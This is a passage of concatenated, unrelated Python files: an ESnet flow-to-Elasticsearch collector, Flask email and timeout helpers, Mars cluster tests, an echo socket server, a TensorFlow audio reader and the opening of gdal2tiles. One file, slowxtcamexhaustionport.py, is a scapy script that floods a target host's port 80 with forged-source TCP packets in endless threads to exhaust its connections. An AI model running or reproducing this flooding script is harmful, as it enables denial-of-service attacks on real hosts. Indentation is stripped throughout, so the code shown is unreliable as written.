}}""" % (i.name, i.lastFlowUpdate.isoformat(), currenttime.isoformat())
r = requests.get(url, dict(query=flow_q), headers=dict(Authorization='Token ' + APIkey))
if r.status_code != 200:
print 'flow got status {0}: {1}'.format(r.status_code, r.content)
return res
dat = r.json()
flows= dat['data']['networkEntity']['flow']
#print(flows)
d = datetime.now()
ind="esnet_"+str(d.year)+"-"+str(d.month)
data = {
'_index': ind,
'_type': 'flow',
'site1': i.name
}
for f in flows:
data['site2']=f["name"].split("(")[0]
st=json.loads(f['traffic'])
traf=st["points"]
for sample in traf:
data['timestamp']=sample[0]
data['rateIn']=sample[1]
data['rateOut']=sample[2]
res.append(data.copy())
print(i.name,'got',len(res),"flow results.")
i.lastFlowUpdate = currenttime
return res
except:
print ("Unexpected error in flow data parsing: ", sys.exc_info()[0])
return res
def GetESConnection(lastReconnectionTime):
if ( time.time()-lastReconnectionTime < 60 ):
return
lastReconnectionTime=time.time()
print ("make sure we are connected right...")
res = requests.get('http://' + ESserver + ':' + str(ESport))
#sys.exit(0)
print(res.content)
es = Elasticsearch([{'host': ESserver, 'port': ESport} ],http_auth=auth,timeout=timeout)
return es
def loader(i):
print ("starting a thread for ", i.name)
while(True):
aLotOfData=getInterfaceData(i)
aLotOfData.extend(getFlowData(i))
try:
res = helpers.bulk(es, aLotOfData, raise_on_exception=True)
aLotOfData=[]
print (i.name, "inserted:",res[0], 'Errors:',res[1])
except es_exceptions.ConnectionError as e:
print ('ConnectionError ', e)
except es_exceptions.TransportError as e:
print ('TransportError ', e)
except helpers.BulkIndexError as e:
print (e)
# for i in e[1]:
# print i
except:
print ('Something seriously wrong happened indexing. ', sys.exc_info()[0])
time.sleep(900)
es = GetESConnection(lastReconnectionTime)
def main():
print('starting collection')
global es
while (not es):
es = GetESConnection(lastReconnectionTime)
interfaces=getInterfaces()
# staggered start loaders threads
for i in interfaces:
time.sleep(20)
t = Thread(target=loader,args=(i,))
t.daemon = True
t.start()
while(True):
at=threading.active_count()
print ("Active threads: ", at)
while (not es):
es = GetESConnection(lastReconnectionTime)
time.sleep(900)
sys.exit()
if __name__ == "__main__":
main()
|
email_util.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from threading import Thread
from flask import current_app
from flask import render_template
from flask_mail import Message
from .. import mail
def send_async_email(_app, msg):
with _app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FORUM_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FORUM_MAIL_SENDER'], recipients=[to])
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
calllimit.py
|
# -*- coding: utf-8 -*-
# @Author: xiaodong
# @Date : 2021/5/29
import time
import typing
import asyncio
import functools
import contextvars
from functools import wraps
from threading import Thread, Event
class LimitExecuteDuration:
"""
限制函数执行时间,如函数执行超时则直接结束。
--- usage:
def your_func(*args, **kwargs):
...
return ...
ins = LimitExecuteDuration(seconds=1).run(your_func, *args, **kwargs)
your_need = ins._result
"""
def __init__(self, seconds: int = 10):
self.seconds = seconds
self._result = None
self._event = Event()
def set_event(self):
self._event.wait(self.seconds)
self._event.set()
def execute(self, func, *args, **kwargs):
if not self._event.is_set():
result = func(*args, **kwargs)
self._result = result
def run(self, func, *args, **kwargs):
t1 = Thread(target=self.execute, args=(func, *args), kwargs=kwargs)
t2 = Thread(target=self.set_event, )
t1.start()
t2.start()
t1.join(self.seconds)
return self
# code from starlette.concurrency
async def run_in_threadpool(
func: typing.Callable, *args: typing.Any, **kwargs: typing.Any
) -> typing.Any:
loop = asyncio.get_event_loop()
if contextvars is not None:
# Ensure we run in the same context
child = functools.partial(func, *args, **kwargs)
context = contextvars.copy_context()
func = context.run
args = (child,)
elif kwargs:
# loop.run_in_executor doesn't accept 'kwargs', so bind them in here
func = functools.partial(func, **kwargs)
return await loop.run_in_executor(None, func, *args)
class LimitExecuteDurationWithAsync:
def __init__(self, seconds: int = 10):
self.seconds = seconds
self._result = None
async def run(self, func, *args, **kwargs):
only_marker = kwargs.pop("marker", False)
if only_marker:
task = asyncio.create_task(
func(*args, **kwargs)
)
else:
task = run_in_threadpool(func, *args, **kwargs)
try:
ret = await asyncio.wait_for(
task, timeout=self.seconds,
)
self._result = ret
except asyncio.TimeoutError:
if hasattr(task, "cancel"):
task.cancel()
except Exception as e:
print(e)
finally:
return self
|
test_local.py
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import threading
import tempfile
import time
import uuid
import numpy as np
import pandas as pd
import pytest
try:
import vineyard
except ImportError:
vineyard = None
from .... import dataframe as md
from .... import tensor as mt
from .... import remote as mr
from ....config import option_context
from ....lib.aio import new_isolation
from ....storage import StorageLevel
from ....services.storage import StorageAPI
from ....tensor.arithmetic.add import TensorAdd
from ..local import new_cluster
from ..service import load_config
from ..session import get_default_async_session, \
get_default_session, new_session, execute, fetch, fetch_infos, \
stop_server, AsyncSession, _IsolatedWebSession
from .modules.utils import ( # noqa: F401; pylint: disable=unused-variable
cleanup_third_party_modules_output,
get_output_filenames,
)
CONFIG_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_config.yml')
CONFIG_VINEYARD_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_vineyard_config.yml')
CONFIG_THIRD_PARTY_MODULES_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_third_parity_modules_config.yml')
params = ['default']
if vineyard is not None:
params.append('vineyard')
@pytest.mark.parametrize(indirect=True)
@pytest.fixture(params=params)
async def create_cluster(request):
if request.param == 'default':
config = CONFIG_TEST_FILE
elif request.param == 'vineyard':
config = CONFIG_VINEYARD_TEST_FILE
start_method = os.environ.get('POOL_START_METHOD', None)
client = await new_cluster(subprocess_start_method=start_method,
config=config,
n_worker=2,
n_cpu=2,
use_uvloop=False)
async with client:
if request.param == 'default':
assert client.session.client is not None
yield client
def _assert_storage_cleaned(session_id: str,
addr: str,
level: StorageLevel):
async def _assert(session_id: str,
addr: str,
level: StorageLevel):
storage_api = await StorageAPI.create(session_id, addr)
assert len(await storage_api.list(level)) == 0
info = await storage_api.get_storage_level_info(level)
assert info.used_size == 0
isolation = new_isolation()
asyncio.run_coroutine_threadsafe(
_assert(session_id, addr, level), isolation.loop).result()
@pytest.mark.asyncio
async def test_execute(create_cluster):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
with pytest.raises(ValueError):
await session.fetch(b + 1)
with pytest.raises(ValueError):
await session.fetch(b[b < 0.6])
del a, b
@pytest.mark.asyncio
async def test_iterative_tiling(create_cluster):
session = get_default_async_session()
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df = df[df[0] < .7]
df2 = df.shift(2)
info = await session.execute(df2)
await info
assert info.result() is None
result = await session.fetch(df2)
expected = raw_df[raw_df[0] < .7].shift(2)
pd.testing.assert_frame_equal(result, expected)
# test meta
assert df2.index_value.min_val >= 1
assert df2.index_value.max_val <= 30
@pytest.mark.asyncio
async def test_execute_describe(create_cluster):
s = np.random.RandomState(0)
raw = pd.DataFrame(s.rand(100, 4), columns=list('abcd'))
df = md.DataFrame(raw, chunk_size=30)
session = get_default_async_session()
r = df.describe()
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
res = await session.fetch(r)
pd.testing.assert_frame_equal(res, raw.describe())
@pytest.mark.asyncio
async def test_sync_execute_in_async(create_cluster):
a = mt.ones((10, 10))
b = a + 1
res = b.to_numpy()
np.testing.assert_array_equal(res, np.ones((10, 10)) + 1)
@pytest.mark.asyncio
async def test_fetch_infos(create_cluster):
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df.execute()
fetched_infos = df.fetch_infos()
assert 'object_id' in fetched_infos
assert 'level' in fetched_infos
assert 'memory_size' in fetched_infos
assert 'store_size' in fetched_infos
assert 'band' in fetched_infos
fetch_infos((df, df), fields=None)
results_infos = mr.ExecutableTuple([df, df]).execute()._fetch_infos()
assert len(results_infos) == 2
assert 'object_id' in results_infos[0]
assert 'level' in results_infos[0]
assert 'memory_size' in results_infos[0]
assert 'store_size' in results_infos[0]
assert 'band' in results_infos[0]
def _my_func():
print('output from function')
async def _run_web_session_test(web_address):
session_id = str(uuid.uuid4())
session = await AsyncSession.init(web_address, session_id)
session.as_default()
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
del a, b
r = mr.spawn(_my_func)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
assert 'output from function' in str(r.fetch_log(session=session))
assert 'output from function' in str(r.fetch_log(session=session,
offsets='0k',
sizes=[1000]))
assert 'output from function' in str(r.fetch_log(session=session,
offsets={r.op.key: '0k'},
sizes=[1000]))
AsyncSession.reset_default()
await session.destroy()
@pytest.mark.asyncio
async def test_web_session(create_cluster):
session_id = str(uuid.uuid4())
web_address = create_cluster.web_address
session = await AsyncSession.init(web_address, session_id)
assert await session.get_web_endpoint() == web_address
session.as_default()
assert isinstance(session._isolated_session, _IsolatedWebSession)
await test_execute(create_cluster)
await test_iterative_tiling(create_cluster)
AsyncSession.reset_default()
await session.destroy()
await _run_web_session_test(web_address)
def test_sync_execute():
session = new_session(n_cpu=2, web=False, use_uvloop=False)
# web not started
assert session._session.client.web_address is None
assert session.get_web_endpoint() is None
with session:
raw = np.random.RandomState(0).rand(10, 5)
a = mt.tensor(raw, chunk_size=5).sum(axis=1)
b = a.execute(show_progress=False)
assert b is a
result = a.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1))
c = b + 1
c.execute(show_progress=False)
result = c.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1) + 1)
c = mt.tensor(raw, chunk_size=5).sum()
d = session.execute(c)
assert d is c
assert abs(session.fetch(d) - raw.sum()) < 0.001
with tempfile.TemporaryDirectory() as tempdir:
file_path = os.path.join(tempdir, 'test.csv')
pdf = pd.DataFrame(np.random.RandomState(0).rand(100, 10),
columns=[f'col{i}' for i in range(10)])
pdf.to_csv(file_path, index=False)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.sum(axis=1).execute().fetch()
expected = pd.read_csv(file_path).sum(axis=1)
pd.testing.assert_series_equal(result, expected)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.head(10).execute().fetch()
expected = pd.read_csv(file_path).head(10)
pd.testing.assert_frame_equal(result, expected)
for worker_pool in session._session.client._cluster._worker_pools:
_assert_storage_cleaned(session.session_id, worker_pool.external_address,
StorageLevel.MEMORY)
session.stop_server()
assert get_default_async_session() is None
def test_no_default_session():
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
with pytest.warns(Warning):
execute(b, show_progress=False)
np.testing.assert_array_equal(fetch(b), raw + 1)
fetch_infos(b, fields=None)
assert get_default_async_session() is not None
stop_server()
assert get_default_async_session() is None
@pytest.fixture
def setup_session():
session = new_session(n_cpu=2, use_uvloop=False)
assert session.get_web_endpoint() is not None
with session:
with option_context({'show_progress': False}):
yield session
session.stop_server()
def test_decref(setup_session):
session = setup_session
a = mt.ones((10, 10))
b = mt.ones((10, 10))
c = b + 1
d = mt.ones((5, 5))
a.execute()
b.execute()
c.execute()
d.execute()
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del b
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del c
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 1
del d
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
rs = np.random.RandomState(0)
pdf = pd.DataFrame({
'a': rs.randint(10, size=10),
'b': rs.rand(10)
})
df = md.DataFrame(pdf, chunk_size=5)
df2 = df.groupby('a').agg('mean', method='shuffle')
result = df2.execute().fetch()
expected = pdf.groupby('a').agg('mean')
pd.testing.assert_frame_equal(result, expected)
del df, df2
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
def _cancel_when_execute(session, cancelled):
def run():
time.sleep(200)
rs = [mr.spawn(run) for _ in range(10)]
execute(*rs, cancelled=cancelled)
assert all(not r._executed_sessions for r in rs)
del rs
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
class SlowTileAdd(TensorAdd):
@classmethod
def tile(cls, op):
time.sleep(2)
return (yield from TensorAdd.tile(op))
def _cancel_when_tile(session, cancelled):
a = mt.tensor([1, 2, 3])
for i in range(20):
a = SlowTileAdd(dtype=np.dtype(np.int64))(a, 1)
execute(a, cancelled=cancelled)
assert not a._executed_sessions
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
@pytest.mark.parametrize(
'test_func', [_cancel_when_execute, _cancel_when_tile])
def test_cancel(setup_session, test_func):
session = setup_session
async def _new_cancel_event():
return asyncio.Event()
isolation = new_isolation()
cancelled = asyncio.run_coroutine_threadsafe(
_new_cancel_event(), isolation.loop).result()
def cancel():
time.sleep(.5)
cancelled.set()
t = threading.Thread(target=cancel)
t.daemon = True
t.start()
start = time.time()
test_func(session, cancelled)
assert time.time() - start < 20
# submit another task
raw = np.random.rand(10, 10)
t = mt.tensor(raw, chunk_size=(10, 5))
np.testing.assert_array_equal(t.execute().fetch(), raw)
def test_load_third_party_modules(cleanup_third_party_modules_output): # noqa: F811
config = load_config()
config['third_party_modules'] = set()
with pytest.raises(TypeError, match='set'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'supervisor': ['not_exists_for_supervisor']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_supervisor'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'worker': ['not_exists_for_worker']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_worker'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = ['mars.deploy.oscar.tests.modules.replace_op']
session = new_session(n_cpu=2, web=False, config=config)
# web not started
assert session._session.client.web_address is None
with session:
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
b.execute(show_progress=False)
result = b.fetch()
np.testing.assert_equal(raw - 1, result)
session.stop_server()
assert get_default_session() is None
session = new_session(n_cpu=2, web=False,
config=CONFIG_THIRD_PARTY_MODULES_TEST_FILE)
# web not started
assert session._session.client.web_address is None
with session:
# 1 main pool, 3 sub pools(2 worker + 1 io).
assert len(get_output_filenames()) == 4
session.stop_server()
assert get_default_session() is None
|
threadedServer.py
|
'''
see https://stackoverflow.com/questions/23828264/how-to-make-a-simple-multithreaded-socket-server-in-python-that-remembers-client
'''
import socket
import threading
class ThreadedServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target = self.listenToClient,args = (client,address)).start()
def listenToClient(self, client, address):
size = 1024
while True:
try:
data = client.recv(size)
if data:
# Set the response to echo back the recieved data
response = data
client.send(response)
else:
raise error('Client disconnected')
except:
client.close()
return False
if __name__ == "__main__":
while True:
port_num = input("Port? ")
try:
port_num = int(port_num)
break
except ValueError:
pass
ThreadedServer('',port_num).listen()
|
slowxtcamexhaustionport.py
|
from scapy.all import *
import time
from random import randint
import threading
from threading import Thread
from multiprocessing import Pool, Process
import os
'''The Internet Assigned Numbers Authority (IANA) suggests the range 49152 to 65535
(2e15+2e14 to 2e16-1) for dynamic or private ports. Many Linux kernels use the port
range 32768 to 61000. FreeBSD has used the IANA port range since release 4.6.'''
#targetIP = '192.168.1.150'
targetIP = '192.168.1.100'
my_ip = '192.168.1.200'
def send_while(pkt_list,i):
while True:
now = time.time()
send(pkt_list)
elapsed = time.time() - now
print "Has been sent", i,"packets in:", elapsed,"seconds."
time.sleep(randint(0,3))
#send(pkt_list, inter=0.25, loop=1)
list_size = 20
pkt_list = []
i = 0
#49912==760
#49952==800
#49827==675
#49832==680
for port in range(49152,49832):
spoofed_pkt = IP(src=my_ip,dst=targetIP) / TCP(sport=port,dport=80)
pkt_list.append(spoofed_pkt)
i = i+1
if i >=list_size:
#Process(target=send_pkts, args=(pkt_list,)).start()
Thread(target=send_while, args=(pkt_list,i,)).start()
i = 0
pkt_list = []
time.sleep(randint(3,10))
|
audio_reader.py
|
from __future__ import print_function
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
def load_audio_alignments(audio_root_dir, alignment_list_file,
sample_rate, context):
'''Load the audio waveforms and alignments from a list file.
The file format is
wav_path user_# : phone#_1 ... phone#_N : log_f0_1 .. log_f0_N
where phone#_t* ints are per-frame phone labels at 100 frames/second
and log_f0_* are per-frame log-f0 values.
'''
assert sample_rate % 100 == 0 # We'll need this.
epoch = 0
files = []
alignments = {}
iphone = iuser = 0
with open(alignment_list_file) as f:
for line in f:
a = line.rstrip().split()
path = os.path.join(audio_root_dir, a.pop(0))
user = int(a.pop(0))
if user >= iuser:
iuser = user+1
assert a.pop(0) == ':'
alen = (len(a) - 1)//(context+1)
assert a[alen*context] == ':'
frame_labels = np.array([int(_) for _ in a[0:alen*context]],
dtype=np.int32)
frame_lf0 = np.array([float(_) for _ in a[alen*context+1:]],
dtype=np.float32)
for i, phone in enumerate(frame_labels):
if phone >= iphone:
iphone = phone+1
frame_labels = frame_labels.reshape(-1, context)
files.append(path)
alignments[path] = user, frame_labels, frame_lf0
print("files length: {} users {} phones {}".format(
len(files), iuser, iphone))
return files, alignments, iuser, iphone
# Never finishes.
def audio_iterator(files, alignments, sample_rate, n_mfcc):
epoch = 0
while True:
random.shuffle(files)
for filename in files:
user_id, frame_labels, frame_lf0 = alignments[filename]
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
# normalize audio
maxv = np.max(np.abs(audio))
if maxv > 1e-5:
audio *= 1.0/maxv
repeat_factor = sample_rate//100
sample_labels = frame_labels.repeat(repeat_factor, axis=0)
sample_lf0 = frame_lf0.repeat(repeat_factor)
audio = audio[:sample_labels.shape[0]] # clip off the excess.
user = np.full((sample_labels.shape[0],), user_id, dtype=np.int32)
mfcc = librosa.feature.mfcc(
audio[:-1], sr=sample_rate, n_mfcc=n_mfcc,
hop_length=repeat_factor, n_fft=400).transpose()
mfcc = mfcc.repeat(repeat_factor, axis=0)
assert len(audio) == len(sample_labels) == len(user) == \
mfcc.shape[0]
yield filename, audio, user, sample_labels, sample_lf0, mfcc
print("Epoch {} ended".format(epoch))
epoch += 1
def trim_silence(audio, user, alignment, lf0, mfcc, threshold):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array if the whole audio was silence.
if indices.size:
audio = audio[indices[0]:indices[-1]]
user = user[indices[0]:indices[-1]]
alignment = alignment[indices[0]:indices[-1], :]
lf0 = lf0[indices[0]:indices[-1]]
mfcc = mfcc[indices[0]:indices[-1], :]
else:
audio = audio[0:0]
user = user[0:0]
alignment = alignment[0:0, :]
lf0 = lf0[0:0]
mfcc = mfcc[0:0, :]
return audio, user, alignment, lf0, mfcc
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self, audio_root_dir, alignment_list_file, coord, sample_rate,
chunk_size, overlap=0, reverse=False, silence_threshold=None,
n_chunks=5, queue_size=5, n_mfcc=12, context=2):
assert chunk_size > overlap
self.coord = coord
self.sample_rate = sample_rate
self.chunk_size = chunk_size
self.reverse = reverse
self.silence_threshold = silence_threshold
self.n_chunks = n_chunks
self.overlap = overlap
self.n_mfcc = n_mfcc
self.context = context # Hard coded for now.
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.user_placeholder = tf.placeholder(dtype=tf.int32, shape=None)
self.align_placeholder = tf.placeholder(dtype=tf.int32, shape=None)
self.lf0_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.mfcc_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(
queue_size,
['float32', 'int32', 'int32', 'float32', 'float32'],
shapes=[(None,), (None,), (None, self.context), (None,),
(None, self.n_mfcc)])
self.enqueue = self.queue.enqueue([self.sample_placeholder,
self.user_placeholder,
self.align_placeholder,
self.lf0_placeholder,
self.mfcc_placeholder])
self.files, self.alignments, self.n_users, self.n_phones = \
load_audio_alignments(audio_root_dir, alignment_list_file,
sample_rate, context)
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
# Thread main is a little tricky. We want to enqueue multiple chunks,
# each from a separate utterance (so that we have speaker diversity
# for each training minibatch.
# We keep an array of buffers for this. We cut fixed sized chunks
# out of the buffers. As each buffer exhausts, we load a new
# audio file (using audio_iterator) and concatenate it with the
# buffer remnants.
def thread_main(self, sess):
# buffers: the array of buffers.
buffers = [(np.array([], dtype=np.float32),
np.array([], dtype=np.int32),
np.array([], dtype=np.int32).reshape(0, self.context),
np.array([], dtype=np.float32),
np.array([], dtype=np.float32).reshape(0, self.n_mfcc)
)]*self.n_chunks
# next(iterator) will never stop. It will allow us to go
# through the data set multiple times.
iterator = audio_iterator(self.files, self.alignments,
self.sample_rate, self.n_mfcc)
# Inflate chunk_size by the amount of overlap for convenience:
orig_chunk_size = self.chunk_size
padded_chunk_size = orig_chunk_size + self.overlap
stop = False
while not stop:
# The buffers array has 3 elements per entry:
# 1) audio. 2) user ID. 3) Phone alignments.
for i, (buffer_, buf_user, buf_align, buf_lf0, buf_mfcc) in \
enumerate(buffers):
if self.coord.should_stop():
stop = True
break
assert len(buffer_) == len(buf_user) == buf_align.shape[0] == \
len(buf_lf0) == buf_mfcc.shape[0]
# Cut samples into fixed size pieces.
# top up the current buffers[i] element if it
# is too short.
while len(buffer_) < padded_chunk_size + 1:
filename, audio, user, alignment, lf0, mfcc = \
next(iterator)
if self.silence_threshold is not None:
# Remove silence
audio, user, alignment, lf0, mfcc = \
trim_silence(audio, user, alignment, lf0, mfcc,
self.silence_threshold)
if audio.size == 0:
print("Warning: {} was ignored as it contains "
"only silence. Consider decreasing "
"trim_silence threshold, or adjust volume "
"of the audio.".format(filename))
if not self.reverse:
buffer_ = np.append(buffer_, audio)
buf_user = np.append(buf_user, user)
buf_align = np.append(buf_align, alignment, axis=0)
buf_lf0 = np.append(buf_lf0, lf0)
buf_mfcc = np.append(buf_mfcc, mfcc, axis=0)
else:
buffer_ = np.append(audio, buffer_)
buf_user = np.append(user, buf_user)
buf_align = np.append(alignment, buf_align, axis=0)
buf_lf0 = np.append(lf0, buf_lf0)
buf_mfcc = np.append(mfcc, buf_mfcc, axis=0)
# Send one piece
if not self.reverse:
piece = buffer_[:padded_chunk_size+1]
piece_user = buf_user[:padded_chunk_size]
piece_align = buf_align[:padded_chunk_size, :]
piece_lf0 = buf_lf0[:padded_chunk_size]
piece_mfcc = buf_mfcc[:padded_chunk_size, :]
buffer_ = buffer_[orig_chunk_size:]
buf_user = buf_user[orig_chunk_size:]
buf_align = buf_align[orig_chunk_size:, :]
buf_lf0 = buf_lf0[orig_chunk_size:]
buf_mfcc = buf_mfcc[orig_chunk_size:, :]
else:
piece = buffer_[-padded_chunk_size-1:]
piece_user = buf_user[-padded_chunk_size:]
piece_align = buf_align[-padded_chunk_size:, :]
piece_lf0 = buf_lf0[-padded_chunk_size:]
piece_mfcc = buf_mfcc[-padded_chunk_size:, :]
buffer_ = buffer_[:-orig_chunk_size]
buf_user = buf_user[:-orig_chunk_size]
buf_align = buf_align[:-orig_chunk_size, :]
buf_lf0 = buf_lf0[:-orig_chunk_size]
buf_mfcc = buf_mfcc[:-orig_chunk_size, :]
sess.run(
self.enqueue,
feed_dict={self.sample_placeholder: piece,
self.user_placeholder: piece_user,
self.align_placeholder: piece_align,
self.lf0_placeholder: piece_lf0,
self.mfcc_placeholder: piece_mfcc})
buffers[i] = (buffer_, buf_user, buf_align, buf_lf0, buf_mfcc)
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
gdal2tiles.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id$
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pipe, Pool, Process, Manager
import os
import tempfile
import shutil
import sys
import time
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
except Exception:
# 'antialias' resampling is not available
pass
__version__ = "$Id$"
resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias')
profile_list = ('mercator', 'geodetic', 'raster')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none')
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
EPSG:4326 EPSG:387
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
